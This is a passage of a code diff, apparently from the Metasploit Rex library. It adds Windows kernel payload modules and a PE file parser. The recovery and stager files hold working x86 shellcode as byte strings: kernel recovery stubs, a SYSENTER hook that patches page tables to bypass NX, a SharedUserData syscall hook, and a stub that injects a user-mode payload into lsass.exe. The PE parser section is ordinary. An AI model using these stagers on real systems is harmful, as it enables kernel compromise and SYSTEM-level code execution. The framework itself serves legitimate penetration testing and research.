+  #
+  def self.resolve_call_sym
+    Rex::Payloads::Win32::Common.resolve_call_sym
+  end
+end
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/migration.rb ADDED

@@ -0,0 +1,13 @@
+# -*- coding: binary -*-
+module Rex
+module Payloads
+module Win32
+module Kernel
+module Migration
+end
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/recovery.rb ADDED

@@ -0,0 +1,51 @@
+# -*- coding: binary -*-
+module Rex
+module Payloads
+module Win32
+module Kernel
+#
+# Recovery stubs are responsible for ensuring that the kernel does not crash.
+# They must 'recover' after the exploit has succeeded, either by consuming
+# the thread or continuing it on with its normal execution.  Recovery stubs
+# will often be exploit dependent.
+#
+module Recovery
+  #
+  # The default recovery method is to spin the thread
+  #
+  def self.default(opts = {})
+    spin(opts)
+  end
+  #
+  # Infinite 'hlt' loop.
+  #
+  def self.spin(opts = {})
+    "\xf4\xeb\xfd"
+  end
+  #
+  # Restarts the idle thread by jumping back to the entry point of
+  # KiIdleLoop.  This requires a hard-coded address of KiIdleLoop.
+  # You can pass the 'KiIdleLoopAddress' in the options hash.
+  #
+  def self.idlethread_restart(opts = {})
+    # Default to fully patched XPSP2
+    opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
+    "\x31\xC0" +                                     # xor eax,eax
+    "\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
+    "\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
+    "\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
+    "\x6A\x00" +                                     # push byte +0x0
+    "\xFF\xE0"                                       # jmp eax
+  end
+end
+end
+end
+end
+end

data/lib/rex/payloads/win32/kernel/stager.rb ADDED

@@ -0,0 +1,195 @@
+# -*- coding: binary -*-
+module Rex
+module Payloads
+module Win32
+module Kernel
+#
+# Stagers are responsible for reading in another payload and executing it.
+# The reading in of the payload may actually be as simple as copying it to
+# another location.  The executing of it may be done either directly or
+# indirectly.
+#
+module Stager
+  #
+  # Works on Vista, Server 2008 and 7.
+  #
+  # Full assembly source at:
+  # /msf3/external/source/shellcode/windows/x86/src/kernel/stager_sysenter_hook.asm
+  #
+  # This payload works as follows:
+  # * Our sysenter handler and ring3 stagers are copied over to safe location.
+  # * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
+  # * The ring0 thread we are in is placed in a halted state.
+  # * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
+  # * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
+  # * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
+  # * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
+  # * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
+  #
+  def self.stager_sysenter_hook( opts = {} )
+    # The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
+    pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
+    # The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
+    kstager   = opts['StagerAddressKernel'] || 0xFFDF0400
+    # The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
+    ustager   = opts['StagerAddressUser'] || 0x7FFE0400
+    # Target SYSTEM process to inject ring3 payload into.
+    process   = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
+    # A simple hash of the process name based on the first 4 wide chars.
+    # Assumes process is located at '*:\windows\system32\'.
+    checksum  = process[0] + ( process[2] << 8 )  + ( process[1] << 16 ) + ( process[3] << 24 )
+    # The ring0 -> ring3 payload blob.
+    r0 =	"\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
+        "\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
+        "\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
+        "\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
+        "\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
+        "\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
+        "\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
+        "\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
+        "\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
+        "\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
+        "\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
+        "\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
+        "\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
+    # The ring3 payload.
+    r3  = ''
+    r3 += _createthread() if opts['CreateThread'] == true
+    r3 += opts['UserModeStub'] || ''
+    # Patch in the required values.
+    r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + r3.length - 0x1C ) ].pack("V") )
+    r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
+    r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
+    r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
+    r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
+    # Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
+    return r0 + r3
+  end
+  #
+  # XP SP2/2K3 SP1 ONLY
+  #
+  # Returns a kernel-mode stager that transitions from r0 to r3 by placing
+  # code in an unused portion of SharedUserData and then pointing the
+  # SystemCall attribute to that unused portion.  This has the effect of
+  # causing the custom code to be called every time a user-mode process
+  # tries to make a system call.  The returned payload also checks to make
+  # sure that it's running in the context of lsass before actually running
+  # the embedded payload.
+  #
+  def self.sud_syscall_hook(opts = {})
+    r0_recovery = opts['RecoveryStub'] || Recovery.default
+    r3_payload  = opts['UserModeStub'] || ''
+    r3_prefix   = _run_only_in_win32proc_stub("\xff\x25\x08\x03\xfe\x7f", opts)
+    r3_size     = ((r3_prefix.length + r3_payload.length + 3) & ~0x3) / 4
+    r0_stager =
+      "\xEB" + [0x22 + r0_recovery.length].pack('C') + # jmp short 0x27
+      "\xBB\x01\x03\xDF\xFF"                         + # mov ebx,0xffdf0301
+      "\x4B"                                         + # dec ebx
+      "\xFC"                                         + # cld
+      "\x8D\x7B\x7C"                                 + # lea edi,[ebx+0x7c]
+      "\x5E"                                         + # pop esi
+      "\x6A" + [r3_size].pack('C')                   + # push byte num_dwords
+      "\x59"                                         + # pop ecx
+      "\xF3\xA5"                                     + # rep movsd
+      "\xBF\x7C\x03\xFE\x7F"                         + # mov edi,0x7ffe037c
+      "\x39\x3B"                                     + # cmp [ebx],edi
+      "\x74\x09"                                     + # jz
+      "\x8B\x03"                                     + # mov eax,[ebx]
+      "\x8D\x4B\x08"                                 + # lea ecx,[ebx+0x8]
+      "\x89\x01"                                     + # mov [ecx],eax
+      "\x89\x3B"                                     + # mov [ebx],edi
+      r0_recovery +
+      "\xe8" + [0xffffffd9 - r0_recovery.length].pack('V') + # call 0x2
+      r3_prefix +
+      r3_payload
+    return r0_stager
+  end
+protected
+  #
+  # Stub to run a prepended ring3 payload in a new thread.
+  #
+  # Full assembly source at:
+  # /msf3/external/source/shellcode/windows/x86/src/single/createthread.asm
+  #
+  def self._createthread
+    r3 =    "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+        "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+        "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+        "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+        "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+        "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+        "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+        "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+        "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+        "\x31\xC0\x50\x50\x50\x8D\x9D\xA0\x00\x00\x00\x53\x50\x50\x68\x38" +
+        "\x68\x0D\x16\xFF\xD5\xC3\x58"
+    return r3
+  end
+  #
+  # This stub is used by stagers to check to see if the code is
+  # running in the context of a user-mode system process.  By default,
+  # this process is lsass.exe.  If it isn't, it runs the code
+  # specified by append.  Otherwise, it jumps past that code and
+  # into what should be the expected r3 payload to execute.  This
+  # stub also makes sure that the payload does not run more than
+  # once.
+  #
+  def self._run_only_in_win32proc_stub(append = '', opts = {})
+    opts['RunInWin32Process'] = "lsass.exe" if opts['RunInWin32Process'].nil?
+    process  = opts['RunInWin32Process'].downcase
+    checksum =
+      process[0]         +
+      (process[2] << 8)  +
+      (process[1] << 16) +
+      (process[3] << 24)
+    "\x60"                                 + # pusha
+    "\x6A\x30"                             + # push byte +0x30
+    "\x58"                                 + # pop eax
+    "\x99"                                 + # cdq
+    "\x64\x8B\x18"                         + # mov ebx,[fs:eax]
+    "\x39\x53\x0C"                         + # cmp [ebx+0xc],edx
+    "\x74\x26"                             + # jz 0x5f
+    "\x8B\x5B\x10"                         + # mov ebx,[ebx+0x10]
+    "\x8B\x5B\x3C"                         + # mov ebx,[ebx+0x3c]
+    "\x83\xC3\x28"                         + # add ebx,byte +0x28
+    "\x8B\x0B"                             + # mov ecx,[ebx]
+    "\x03\x4B\x03"                         + # add ecx,[ebx+0x3]
+    "\x81\xF9" + [checksum].pack('V')      + # cmp ecx,prochash
+    "\x75\x10"                             + # jnz 0x5f
+    "\x64\x8B\x18"                         + # mov ebx,[fs:eax]
+    "\x43"                                 + # inc ebx
+    "\x43"                                 + # inc ebx
+    "\x43"                                 + # inc ebx
+    "\x80\x3B\x01"                         + # cmp byte [ebx],0x1
+    "\x74\x05"                             + # jz 0x5f
+    "\xC6\x03\x01"                         + # mov byte [ebx],0x1
+    "\xEB" + [append.length + 1].pack('C') + # jmp stager
+    "\x61" + append						        # restore regs
+  end
+end
+end
+end
+end
+end

data/lib/rex/peparsey.rb ADDED

@@ -0,0 +1,10 @@
+# -*- coding: binary -*-
+module Rex
+module PeParsey
+end
+end
+require 'rex/peparsey/pe'
+require 'rex/peparsey/pe_memdump'

data/lib/rex/peparsey/exceptions.rb ADDED

@@ -0,0 +1,30 @@
+# -*- coding: binary -*-
+module Rex
+module PeParsey
+class PeError < ::RuntimeError
+end
+class ParseError < PeError
+end
+class DosHeaderError < ParseError
+end
+class FileHeaderError < ParseError
+end
+class OptionalHeaderError < ParseError
+end
+class BoundsError < PeError
+end
+class WtfError < PeError
+end
+class SkipError < PeError
+end
+end end

data/lib/rex/peparsey/pe.rb ADDED

@@ -0,0 +1,210 @@
+# -*- coding: binary -*-
+require 'rex/image_source'
+require 'rex/peparsey/exceptions'
+require 'rex/peparsey/pebase'
+require 'rex/peparsey/section'
+require 'rex/struct2'
+module Rex
+module PeParsey
+class Pe < PeBase
+  def initialize(isource)
+    #
+    # DOS Header
+    #
+    # Parse the initial dos header, starting at the file beginning
+    #
+    offset = 0
+    dos_header = self.class._parse_dos_header(isource.read(offset, IMAGE_DOS_HEADER_SIZE))
+    #
+    # File Header
+    #
+    # If there is going to be a PE, the dos header tells us where to find it
+    # So now we try to parse the file (pe) header
+    #
+    offset += dos_header.e_lfanew
+    # most likely an invalid e_lfanew...
+    if offset > isource.size
+      raise FileHeaderError, "e_lfanew looks invalid", caller
+    end
+    file_header = self.class._parse_file_header(isource.read(offset, IMAGE_FILE_HEADER_SIZE))
+    #
+    # Optional Header
+    #
+    # After the file header, we find the optional header.  Right now
+    # we require a optional header.  Despite it's name, all binaries
+    # that we are interested in should have one.  We need this
+    # header for a lot of stuff, so we die without it...
+    #
+    offset += IMAGE_FILE_HEADER_SIZE
+    optional_header = self.class._parse_optional_header(
+      isource.read(offset, file_header.SizeOfOptionalHeader)
+    )
+    if !optional_header
+      raise OptionalHeaderError, "No optional header!", caller
+    end
+    base = optional_header.ImageBase
+    #
+    # Section Headers
+    #
+    # After the optional header should be the section headers.
+    # We know how many there should be from the file header...
+    #
+    offset += file_header.SizeOfOptionalHeader
+    num_sections = file_header.NumberOfSections
+    section_headers = self.class._parse_section_headers(
+      isource.read(offset, IMAGE_SIZEOF_SECTION_HEADER * num_sections)
+    )
+    #
+    # End of Headers
+    #
+    # After the section headers (which are padded to FileAlignment)
+    # we should find the section data, described by the section
+    # headers...
+    #
+    # So this is the end of our header data, lets store this
+    # in an image source for possible access later...
+    #
+    offset += IMAGE_SIZEOF_SECTION_HEADER * num_sections
+    offset = self.class._align_offset(offset, optional_header.FileAlignment)
+    header_section = Section.new(isource.subsource(0, offset), 0, nil)
+    #
+    # Sections
+    #
+    # So from here on out should be section data, and then any
+    # trailing data (like authenticode and stuff I think)
+    #
+    sections = [ ]
+    section_headers.each do |section_header|
+      rva         = section_header.VirtualAddress
+      size        = section_header.SizeOfRawData
+      file_offset = section_header.PointerToRawData
+      sections << Section.new(
+        isource.subsource(file_offset, size),
+        rva,
+        section_header
+      )
+    end
+    #
+    # Save the stuffs!
+    #
+    # We have parsed enough to load the file up here, now we just
+    # save off all of the structures and data... We will
+    # save our fake header section, the real sections, etc.
+    #
+    #
+    # These should not be accessed directly
+    #
+    self._isource          = isource
+    self._dos_header       = dos_header
+    self._file_header      = file_header
+    self._optional_header  = optional_header
+    self._section_headers  = section_headers
+    self.image_base        = base
+    self.sections          = sections
+    self.header_section    = header_section
+    self._config_header    = _parse_config_header()
+    self._tls_header       = _parse_tls_header()
+    # These can be accessed directly
+    self.hdr               = HeaderAccessor.new
+    self.hdr.dos           = self._dos_header
+    self.hdr.file          = self._file_header
+    self.hdr.opt           = self._optional_header
+    self.hdr.sections      = self._section_headers
+    self.hdr.config        = self._config_header
+    self.hdr.tls           = self._tls_header
+    self.hdr.exceptions    = self._exception_header
+    # We load the exception directory last as it relies on hdr.file to be created above.
+    self._exception_header = _load_exception_directory()
+  end
+  #
+  # Return everything that's going to be mapped in the process
+  # and accessable.  This should include all of the sections
+  # and our "fake" section for the header data...
+  #
+  def all_sections
+    [ header_section ] + sections
+  end
+  #
+  # Returns true if this binary is for a 64-bit architecture.
+  #
+  def ptr_64?
+    [
+      IMAGE_FILE_MACHINE_IA64,
+      IMAGE_FILE_MACHINE_ALPHA64,
+      IMAGE_FILE_MACHINE_AMD64
+    ].include?(self._file_header.Machine)
+  end
+  #
+  # Returns true if this binary is for a 32-bit architecture.
+  # This check does not take into account 16-bit binaries at the moment.
+  #
+  def ptr_32?
+    ptr_64? == false
+  end
+  #
+  # Converts a virtual address to a string representation based on the
+  # underlying architecture.
+  #
+  def ptr_s(va)
+    (ptr_32?) ? ("0x%.8x" % va) : ("0x%.16x" % va)
+  end
+  #
+  # Converts a file offset into a virtual address
+  #
+  def file_offset_to_va(offset)
+    image_base + file_offset_to_rva(offset)
+  end
+  #
+  # Read raw bytes from the specified offset in the underlying file
+  #
+  # NOTE: You should pass raw file offsets into this, not offsets from
+  # the beginning of the section. If you need to read from within a
+  # section, add section.file_offset prior to passing the offset in.
+  #
+  def read(offset, len)
+    _isource.read(offset, len)
+  end
+  def size
+    _isource.size
+  end
+  def length
+    _isource.size
+  end
+end end end